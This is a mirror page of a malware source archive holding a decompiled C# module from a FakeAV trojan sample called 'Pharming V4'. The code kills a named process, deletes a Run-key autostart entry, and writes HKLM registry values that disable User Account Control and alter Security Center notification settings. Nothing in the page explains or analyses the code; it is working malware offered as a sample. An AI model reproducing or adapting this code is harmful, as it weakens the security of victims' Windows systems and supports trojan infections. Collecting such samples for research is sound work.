mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
52 lines
1.7 KiB
C#
52 lines
1.7 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Pharming_V4.pharmantiga
|
|
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
|
|
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using Microsoft.Win32;
|
|
using System;
|
|
using System.Diagnostics;
|
|
|
|
namespace Pharming_V4
|
|
{
|
|
[StandardModule]
|
|
internal sealed class pharmantiga
|
|
{
|
|
public static void pharmantiga()
|
|
{
|
|
try
|
|
{
|
|
Process[] processesByName = Process.GetProcessesByName("windowsfiledk");
|
|
int index = 0;
|
|
while (index < processesByName.Length)
|
|
{
|
|
processesByName[index].Kill();
|
|
checked { ++index; }
|
|
}
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
try
|
|
{
|
|
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).DeleteValue("www.msn.com");
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", true);
|
|
registryKey1.SetValue("EnableLUA", (object) 0);
|
|
registryKey1.Close();
|
|
RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Security Center", true);
|
|
registryKey2.SetValue("UacDisableNotify", (object) 0);
|
|
registryKey2.Close();
|
|
}
|
|
}
|
|
}
|